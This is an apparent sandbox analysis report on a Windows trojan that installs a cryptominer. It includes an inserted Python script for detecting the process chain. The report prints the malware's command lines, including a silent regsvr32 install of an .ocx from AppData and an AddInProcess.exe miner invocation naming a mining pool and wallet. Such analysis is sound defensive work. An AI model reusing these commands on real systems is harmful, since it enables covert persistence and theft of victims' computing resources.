Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASNUS
Source: Joe Sandbox View | ASN Name: DRAVANET-ASHU
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic | Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.8:65271 -> 161.35.34.195:3333
Source: unknown | TCP traffic detected without corresponding DNS query: 93.88.203.169 (46 connections)
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1 (4 connections)
Source: global traffic | DNS traffic detected: DNS query: github.com
Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic | DNS traffic detected: DNS query: rx.unmineable.com
Source: powershell.exe, 00000017.00000002.2556092783.00000260DF375000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoftyx
Source: 77EC63BDA74BD0D0E0426DC8F80085060.0.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe, 00000000.00000003.1654868087.000002DD74574000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?630f8209ac
Source: powershell.exe, 0000000F.00000002.2340817033.000001AD47267000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2476958732.00000227EBA27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2723313503.00000260F12A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000017.00000002.2563510013.00000260E1467000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000F.00000002.2314170593.000001AD37427000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2386841353.00000227DBBE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3296328349.0000017280227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2563510013.00000260E1467000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000F.00000002.2314170593.000001AD37201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2386841353.00000227DB9C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3296328349.0000017280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2563510013.00000260E1241000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.2314170593.000001AD37427000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2386841353.00000227DBBE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3296328349.0000017280227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2563510013.00000260E1467000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000017.00000002.2563510013.00000260E1467000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Stamp_Setup.exe, 00000009.00000003.2208117254.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.exe, 00000009.00000003.2207823891.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.tmp, 0000000A.00000000.2208874921.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Stamp_Setup.tmp.11.dr, is-T07R8.tmp.12.dr, Stamp_Setup.tmp.9.dr | String found in binary or memory: http://www.innosetup.com/
Source: powershell.exe, 0000000F.00000002.2346451258.000001AD4F3AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: Stamp_Setup.exe, 00000009.00000003.2208117254.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.exe, 00000009.00000003.2207823891.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.tmp, 0000000A.00000000.2208874921.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Stamp_Setup.tmp.11.dr, is-T07R8.tmp.12.dr, Stamp_Setup.tmp.9.dr | String found in binary or memory: http://www.remobjects.com/ps
Source: powershell.exe, 0000000F.00000002.2314170593.000001AD37201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2386841353.00000227DB9C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3296328349.0000017280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2563510013.00000260E1241000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000017.00000002.2563510013.00000260E1467000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000000F.00000002.2314170593.000001AD38E53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2314170593.000001AD38E2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2386841353.00000227DD617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2386841353.00000227DD5F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2563510013.00000260E2E8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2563510013.00000260E2E67000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: powershell.exe, 00000017.00000002.2723313503.00000260F12A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000017.00000002.2723313503.00000260F12A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000017.00000002.2723313503.00000260F12A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support/rust/deps
Source: powershell.exe, 00000017.00000002.2563510013.00000260E1467000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000F.00000002.2346451258.000001AD4F3AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.mh
Source: powershell.exe, 0000000F.00000002.2314170593.000001AD391CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2386841353.00000227DD993000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2563510013.00000260E3208000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
          Source: powershell.exe, 0000000F.00000002.2340817033.000001AD47267000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2476958732.00000227EBA27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2723313503.00000260F12A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 65257
Source: unknown | Network traffic detected: HTTP traffic on port 65259 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 65257 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 65259
Source: unknown | HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.8:65257 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:65259 version: TLS 1.2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Process Stats: CPU usage > 49%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_00007FFB4B1C4FFB
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp (SHA256 266718A4D3E4A60D060E8E7B39E4A80CB497752D8C01568F98C7D657A83FCC3E)
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmp (SHA256 266718A4D3E4A60D060E8E7B39E4A80CB497752D8C01568F98C7D657A83FCC3E)
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\is-9STL2.tmp\_isetup\_isdecmp.dll (SHA256 E19781AABE466DD8779CB9C8FA41BBB73375447066BB34E876CF388A6ED63C64)
Source: Stamp_Setup.exe.0.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: Stamp_Setup.tmp.9.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: Stamp_Setup.tmp.9.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: Stamp_Setup.tmp.11.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: Stamp_Setup.tmp.11.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-T07R8.tmp.12.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-T07R8.tmp.12.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Static PE information: Number of sections : 11 > 10
Source: is-H1DAG.tmp.12.dr | Static PE information: Number of sections : 12 > 10
Source: classification engine | Classification label: mal100.troj.spyw.evad.mine.winEXE@40/35@3/4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | File created: C:\Users\user\AppData\Roaming\Stamp_Setup.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Mutant created: \Sessions\1\BaseNamedObjects\94a5dd291cdb
Source: C:\Windows\System32\regsvr32.exe | Mutant created: \Sessions\1\BaseNamedObjects\f89114cf33aebcc91e3e40b5b0ff7e34
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1308:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4792:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Mutant created: \Sessions\1\BaseNamedObjects\StrangeRod
Source: C:\Windows\System32\regsvr32.exe | Mutant created: \Sessions\1\BaseNamedObjects\IntriguedLeopard
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2680:120:WilError_03
Source: C:\Windows\System32\regsvr32.exe | Mutant created: \Sessions\1\BaseNamedObjects\2f4cb03984c191cc482337
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | File created: C:\Users\user\AppData\Local\Temp\u9KSgzq29lys.bat
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\u9KSgzq29lys.bat" "
Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor (the same query is listed 65 times in the report)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Virustotal: Detection: 58%
Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | ReversingLabs: Detection: 50%
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\u9KSgzq29lys.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 5 localhost
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Roaming\Stamp_Setup.exe "C:\Users\user\AppData\Roaming\Stamp_Setup.exe"
Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exe | Process created: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmp "C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmp" /SL5="$A0052,1101402,160256,C:\Users\user\AppData\Roaming\Stamp_Setup.exe"
Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmp | Process created: C:\Users\user\AppData\Roaming\Stamp_Setup.exe "C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENT
Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exe | Process created: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp "C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp" /SL5="$C01D8,1101402,160256,C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp | Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx"
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\regsvr32.exe /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx"
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -NoProfile -NonInteractive -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50
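The process rows above describe the full chain a hunter would want to encode: a dropped batch file that sleeps with `ping -n 5 localhost`, an Inno Setup installer re-run with `/VERYSILENT`, `regsvr32 /s /i:INSTALL` on an `.ocx` under `AppData\Roaming`, a PowerShell probe that checks whether a scheduled task already runs that same regsvr32 command, and finally the signed .NET host `AddInProcess.exe` started with XMRig-style arguments (pool `rx.unmineable.com:3333`, algorithm `rx`, wallet plus `RIG_CPU` worker). The Python below is an added example written for this page; it is not Joe Sandbox code and not the sample's code. It runs over constructed process-creation events copied from the command lines listed above and over a constructed scheduled-task XML export; the report only shows the sample querying for such a task, so the task XML and the list of user-writable directories are assumptions, and all function names are the example's own.

```python
# Added triage example for the process chain in this report; events and task
# XML are constructed from the listed command lines (the task itself is assumed).
import re
import shlex
import xml.etree.ElementTree as ET

# Directories a standard user can write to; a regsvr32 /i: target here is suspect.
USER_WRITABLE = re.compile(r"\\(AppData|ProgramData|Temp|Public)\\", re.IGNORECASE)
TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"
MINER_OPTS = {"-o", "--url", "-a", "--algo", "-u", "--user", "-p", "--pass"}

# Constructed process-creation events: (parent image, image, command line).
EVENTS = [
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\PING.EXE",
     r"ping -n 5 localhost"),
    (r"C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp",
     r"C:\Windows\SysWOW64\regsvr32.exe",
     r'"regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx"'),
    (r"C:\Windows\System32\regsvr32.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'''"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' }) { exit 0 } else { exit 1 }"'''),
    (r"C:\Windows\System32\regsvr32.exe",
     r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe",
     r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50"),
]


def tokens(cmdline):
    """Split a Windows command line: backslashes stay literal, quotes are stripped."""
    return [t.strip('"') for t in shlex.split(cmdline, posix=False)]


def parse_miner_args(cmdline):
    """Extract pool, algorithm and wallet/worker from XMRig-style arguments.
    Returns None when there is no '-o host:port' pool argument."""
    toks = tokens(cmdline)[1:]  # drop the image path
    opts, i = {}, 0
    while i < len(toks):
        tok = toks[i]
        if tok.startswith("--") and "=" in tok:          # --key=value form
            key, val = tok[2:].split("=", 1)
            opts[key] = val
        elif tok in MINER_OPTS and i + 1 < len(toks):   # -o value form
            opts[tok.lstrip("-")] = toks[i + 1]
            i += 1
        elif tok == "-k":                                # keepalive flag
            opts["keepalive"] = True
        i += 1
    pool = opts.get("o") or opts.get("url")
    if not pool or ":" not in pool:
        return None
    host, port = pool.rsplit(":", 1)
    wallet, _, worker = (opts.get("u") or opts.get("user", "")).partition(".")
    return {"pool": host, "port": int(port) if port.isdigit() else None,
            "algo": opts.get("a") or opts.get("algo"), "wallet": wallet,
            "worker": worker, "threads_hint": opts.get("cpu-max-threads-hint")}


def triage_event(parent, image, cmdline):
    """Return the finding labels one process-creation event triggers."""
    base = image.rsplit("\\", 1)[-1].lower()
    low = cmdline.lower()
    findings = []
    if base == "regsvr32.exe" and "/i:" in low and USER_WRITABLE.search(cmdline):
        findings.append("regsvr32_install_from_user_path")
    if base == "powershell.exe" and "get-scheduledtask" in low and "regsvr32" in low:
        findings.append("scheduled_task_self_check")  # sample probing its own persistence
    if base == "ping.exe" and parent.lower().endswith("cmd.exe"):
        m = re.search(r"-n\s+(\d+)\s+(localhost|127\.0\.0\.1)", low)
        if m:  # N echo requests one second apart: roughly N-1 seconds of delay
            findings.append(f"ping_sleep_{int(m.group(1)) - 1}s")
    if base == "addinprocess.exe" and parse_miner_args(cmdline):
        findings.append("dotnet_host_with_miner_args")  # signed .NET host carrying miner flags
    return findings


# Constructed scheduled-task export (shape of 'schtasks /query /xml' output) for
# the action the sample's PowerShell probe looks for. Assumed, not observed.
TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>regsvr32</Command>
      <Arguments>/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx</Arguments>
    </Exec>
  </Actions>
</Task>"""


def regsvr32_task_actions(task_xml):
    """(command, arguments) for every Exec action running regsvr32 /i: on a
    file in a user-writable directory."""
    hits = []
    for exe in ET.fromstring(task_xml).iter(TASK_NS + "Exec"):
        cmd = (exe.findtext(TASK_NS + "Command") or "").strip().strip('"')
        args = (exe.findtext(TASK_NS + "Arguments") or "").strip()
        if (cmd.rsplit("\\", 1)[-1].lower() in ("regsvr32", "regsvr32.exe")
                and "/i:" in args.lower() and USER_WRITABLE.search(args)):
            hits.append((cmd, args))
    return hits


if __name__ == "__main__":
    for parent, image, cmdline in EVENTS:
        print(image.rsplit("\\", 1)[-1], triage_event(parent, image, cmdline))
    print("miner:", parse_miner_args(EVENTS[3][2]))
    print("task actions:", regsvr32_task_actions(TASK_XML))
```

The miner parser is the piece worth keeping: `AddInProcess.exe` is a legitimate, Microsoft-signed binary, so an image-name rule never fires; what gives it away is a `-o host:port` pool argument and a `-u wallet.worker` string in a process that has no business carrying them, and the same parser extracts the pool and wallet as indicators for blocking and attribution.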
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: cryptnet.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: cabinet.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: iertutil.dll
